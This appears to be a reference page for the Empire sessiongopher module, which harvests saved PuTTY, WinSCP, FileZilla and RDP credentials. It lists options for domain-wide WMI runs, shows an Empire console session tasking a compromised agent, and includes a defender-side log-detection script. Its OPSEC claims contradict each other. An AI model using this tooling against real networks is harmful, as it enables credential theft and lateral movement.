Invoke-SessionGopher - Empire Module
This page contains detailed information about how to use the powershell/credentials/sessiongopher Empire module. For a list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-SessionGopher
Module: powershell/credentials/sessiongopher
Source code [1]: empire/server/modules/powershell/credentials/sessiongopher.yaml
Source code [2]: empire/server/data/module_source/credentials/Invoke-SessionGopher.ps1
MITRE ATT&CK:
T1081
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: No
The sessiongopher module extracts saved sessions and passwords for WinSCP, PuTTY, SuperPuTTY, FileZilla and RDP, as well as from .ppk, .rdp and .sdtid files.
This module runs in the foreground and is OPSEC unsafe, as it writes to disk (the o switch drops a folder of .csv output on the host) and could therefore be detected by AV/EDR running on the target system.
Note that the sessiongopher module does not need administrative privileges to work, which means that a normal user can run it.
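As an added defender-side example (not part of this page or the Empire project), the Python below scores constructed PowerShell script block log records for the indicators this module exposes: its function name, the AllDomain/Target/iL remote switches, the o disk-output switch, and the .ppk/.rdp/.sdtid file-type sweep. The event IDs, host names and user names are assumed sample values.

```python
import re
from typing import Optional

# Constructed sample records shaped like PowerShell script block log events
# (Event ID 4104, Microsoft-Windows-PowerShell/Operational). The script text is
# invented; only the function name, switches and file types come from the module description.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS01", "User": "CORP\\jerry",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"EventID": 4104, "Computer": "WS01", "User": "CORP\\jerry",
     "ScriptBlockText": "Invoke-SessionGopher -Thorough"},
    {"EventID": 4104, "Computer": "WS02", "User": "CORP\\svc_backup",
     "ScriptBlockText": "Invoke-SessionGopher -AllDomain -u corp.com\\jerry -p <redacted> -o"},
    {"EventID": 4103, "Computer": "WS02", "User": "CORP\\svc_backup",
     "ScriptBlockText": "Invoke-SessionGopher"},  # module logging, not a script block event
    {"EventID": 4104, "Computer": "WS03", "User": "CORP\\alice",
     "ScriptBlockText": "Get-ChildItem C:\\ -Recurse -Include *.ppk,*.rdp,*.sdtid"},
]

# Indicators taken from the module's documented behaviour. A renamed copy of the
# script loses the function name but still sweeps for the same file types.
INDICATORS = {
    "module_name": re.compile(r"Invoke-SessionGopher", re.IGNORECASE),
    "remote_scope": re.compile(r"-(AllDomain|Target|iL)\b", re.IGNORECASE),  # WMI fan-out
    "disk_output": re.compile(r"(^|\s)-o\b", re.IGNORECASE),  # drops .csv folder on host
    "thorough_search": re.compile(r"-Thorough\b", re.IGNORECASE),
    "session_file_types": re.compile(r"\.(ppk|rdp|sdtid)\b", re.IGNORECASE),
}

def score_event(event: dict) -> Optional[dict]:
    """Return an alert for one log record, or None when nothing matches."""
    if event.get("EventID") != 4104:
        return None
    text = event.get("ScriptBlockText", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Require the tool name or the file-type sweep; switches alone are too generic.
    if "module_name" not in hits and "session_file_types" not in hits:
        return None
    # Remote execution or output written to disk widens the blast radius.
    severity = "high" if {"remote_scope", "disk_output"} & set(hits) else "medium"
    return {"computer": event.get("Computer"), "user": event.get("User"),
            "severity": severity, "indicators": hits}

def scan(events) -> list:
    """Run score_event over a batch and keep only the alerts."""
    return [a for a in (score_event(e) for e in events) if a is not None]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```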
Required Module Options
This is a list of options that are required by the sessiongopher module:
Agent
Agent to run module on.
Additional Module Options
This is a list of additional options that are supported by the sessiongopher module:
AllDomain
Switch. Run against all computers on domain. Uses current security context, unless -u and -p arguments provided. Uses WMI.
Target
Provide a single host to run remotely against. Uses WMI.
Thorough
Switch. Searches entire filesystem for .ppk, .rdp, .sdtid files. Not recommended to use with -AllDomain due to time.
iL
Provide path to a .txt file on the remote host containing hosts separated by newlines to run remotely against. Uses WMI.
o
Switch. Drops a folder of all output in .csvs on remote host.
p
Password for user account (if -u argument provided).
u
User account (e.g. corp.com\jerry) for when using -Target, -iL, or -AllDomain. If not provided, uses current security context.
Sessiongopher Example Usage
Here's an example of how to use the sessiongopher module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/sessiongopher
Author @arvanaghi, created at FireEye
Background False
Comments Twitter: @arvanaghi
https://arvanaghi.com
https://github.com/fireeye/SessionGopher
Description Extract saved sessions & passwords for WinSCP, PuTTY, SuperPuTTY,
FileZilla, RDP, .ppk files, .rdp files, .sdtid files
Language powershell
Name powershell/credentials/sessiongopher
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1081
,Record Options-----,----------,-------------------------------------,
| Name | Value | Required | Description |
|-----------|-------|----------|-------------------------------------|
| Agent | | True | Agent to run module on. |
|-----------|-------|----------|-------------------------------------|
| AllDomain | | False | Switch. Run against all computers |
| | | | on domain. Uses current security |
| | | | context, unless -u and -p arguments |
| | | | provided. Uses WMI. |
|-----------|-------|----------|-------------------------------------|
| Target | | False | Provide a single host to run |
| | | | remotely against. Uses WMI. |
|-----------|-------|----------|-------------------------------------|
| Thorough | | False | Switch. Searches entire filesystem |
| | | | for .ppk, .rdp, .sdtid files. Not |
| | | | recommended to use with -AllDomain |
| | | | due to time. |
|-----------|-------|----------|-------------------------------------|
| iL | | False | Provide path to a .txt file on the |
| | | | remote host containing hosts |
| | | | separated by newlines to run |
| | | | remotely against. Uses WMI. |
|-----------|-------|----------|-------------------------------------|
| o | | False | Switch. Drops a folder of all |
| | | | output in .csvs on remote host. |
|-----------|-------|----------|-------------------------------------|
| p | | False | Password for user account (if -u |
| | | | argument provided). |
|-----------|-------|----------|-------------------------------------|
| u | | False | User account (e.g. corp.com\jerry) |
| | | | for when using -Target, -iL, or |
| | | | -AllDomain. If not provided, uses |
| | | | current security context. |
'-----------'-------'----------'-------------------------------------'
(Empire: usemodule/powershell/credentials/sessiongopher) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/sessiongopher) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come back.
Authors
- @arvanaghi
- created at FireEye
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/credentials/sessiongopher.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/data/module_source/credentials/Invoke-SessionGopher.ps1
- https://arvanaghi.com
- https://github.com/fireeye/SessionGopher
- http://attack.mitre.org/techniques/T1081
See Also
Check also the following modules related to this module:
- powershell/credentials/rubeus
- powershell/credentials/vault_credential
- powershell/credentials/invoke_kerberoast
- powershell/credentials/DomainPasswordSpray
- powershell/credentials/invoke_internal_monologue
- powershell/credentials/powerdump
- powershell/credentials/enum_cred_store
- powershell/credentials/invoke_ntlmextract
- powershell/credentials/get_lapspasswords
- powershell/credentials/sharpsecdump
- powershell/credentials/credential_injection
- powershell/credentials/tokens
- powershell/credentials/mimikatz/pth
- powershell/credentials/mimikatz/silver_ticket
- powershell/credentials/mimikatz/cache
- powershell/credentials/mimikatz/command
- powershell/credentials/mimikatz/terminal_server
- powershell/credentials/mimikatz/extract_tickets
- powershell/credentials/mimikatz/keys
- powershell/credentials/mimikatz/sam
- powershell/credentials/mimikatz/trust_keys
- powershell/credentials/mimikatz/purge
- powershell/credentials/mimikatz/logonpasswords
- powershell/credentials/mimikatz/certs
- powershell/credentials/mimikatz/dcsync
- powershell/credentials/mimikatz/lsadump
- powershell/credentials/mimikatz/mimitokens
- powershell/credentials/mimikatz/golden_ticket
- powershell/credentials/mimikatz/dcsync_hashdump
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.